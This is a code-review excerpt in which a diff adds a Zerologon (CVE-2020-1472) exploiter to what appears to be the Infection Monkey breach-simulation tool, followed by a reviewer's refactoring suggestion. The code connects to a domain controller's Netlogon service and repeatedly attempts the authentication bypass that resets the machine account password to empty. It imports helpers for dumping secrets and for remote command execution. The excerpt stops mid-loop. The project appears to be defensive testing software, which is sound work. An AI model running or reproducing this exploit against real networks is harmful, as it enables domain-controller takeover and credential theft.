monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,365 @@
+"""
+Zerologon, CVE-2020-1472
+Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/.
+"""
+
+import io
+import logging
+import os
+import sys
+from binascii import unhexlify
+from typing import List, Optional
+
+import impacket
+from impacket.dcerpc.v5 import epm, nrpc, transport
+from impacket.dcerpc.v5.dtypes import NULL
+
+from common.utils.exploit_enum import ExploitType
+from infection_monkey.exploit.HostExploiter import HostExploiter
+from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
+from infection_monkey.exploit.zerologon_utils.options import \
+    OptionsForSecretsdump
+from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
+from infection_monkey.network.zerologon_fingerprint import ZerologonFinger
+
+LOG = logging.getLogger(__name__)
+
+
+class ZerologonExploiter(HostExploiter):
+    _TARGET_OS_TYPE = ['windows']
+    _EXPLOITED_SERVICE = 'Netlogon'
+    EXPLOIT_TYPE = ExploitType.VULNERABILITY
+    RUNS_AGENT_ON_SUCCESS = False
+    MAX_ATTEMPTS = 2000
+    ERROR_CODE_ACCESS_DENIED = 0xc0000022
+
+    def __init__(self, host: object):
+        super().__init__(host)
+        self.vulnerable_port = None
+        self.zerologon_finger = ZerologonFinger()
+        self.exploit_info['credentials'] = {}
+
+    def _exploit_host(self) -> Optional[bool]:
+        self.dc_ip, self.dc_name, self.dc_handle = self.zerologon_finger._get_dc_details(self.host)
+
+        if self.is_exploitable():
+            LOG.info("Target vulnerable, changing account password to empty string.")
+
+            # Connect to the DC's Netlogon service.
+            try:
+                rpc_con = self.connect_to_dc()
+            except Exception as e:
+                LOG.info(f"Exception occurred while connecting to DC: {str(e)}")
+                return
+
+            # Start exploiting attempts.
+            # Max attempts = 2000. Expected average number of attempts needed: 256.
+            LOG.debug("Attempting exploit.")
+            result = None
+            for _ in range(0, self.MAX_ATTEMPTS):
+                try:
+                    result = self.attempt_exploit(rpc_con)
+                except nrpc.DCERPCSessionError as e:
+                    # Failure should be due to a STATUS_ACCESS_DENIED error.
+                    # Otherwise, the attack is probably not working.
+                    if e.get_error_code() != self.ERROR_CODE_ACCESS_DENIED:
+                        LOG.info(f"Unexpected error code from DC: {e.get_error_code()}")
+                except BaseException as e:
+                    LOG.info(f"Unexpected error: {e}")
+
+                if result is not None:
```

Comment:
This whole `for` loop could be refactored into a method. I imagine code here looking something like 
```
try:
    response = self._send_rpc_login_requests()
except NoRpcLoginsSucceeded():
    self.report_login_attempt(result=False, user=self.dc_name)
    ...
 ```